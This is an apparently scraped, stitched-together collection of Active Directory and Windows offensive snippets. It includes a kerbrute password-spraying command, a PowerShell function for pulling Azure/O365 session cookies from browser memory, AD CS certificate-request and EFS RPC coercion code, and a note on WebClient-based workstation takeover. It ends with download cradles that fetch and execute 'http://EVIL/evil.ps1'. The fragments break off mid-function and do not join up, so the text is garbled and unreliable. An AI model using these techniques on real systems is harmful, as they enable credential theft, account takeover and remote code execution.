With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# This scriptlet relies on https://github.com/glmcdona/strings2
# Import the script: PS> import-module .\Process_String_Extractor.ps1
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World"
# To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie"
function ScrapeProcessMemory {
Param(
[Parameter(Mandatory)]
[string]$Processname,
[Parameter(Mandatory)]
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
Install-Module NtObjectManager
Import-Module NtObjectManager
$Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll `
-DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll'
$EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' }
$client = Get-RpcClient -Server $EfsInterace
$client.Connect()
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:
The caveat is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely, which I cover in a section below.
#!/usr/bin/python
'''
$ python sniffCert.py -h
Usage: sniffCert.py [options]
Options:
-h, --help show this help message and exit
-i INTERFACENO Interface to sniff
$ python sniffCert.py -i en0
function Invoke-SMBShellcodeLoad {
<#
.SYNOPSIS
Short description
.DESCRIPTION
Long description
.EXAMPLE
An example
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object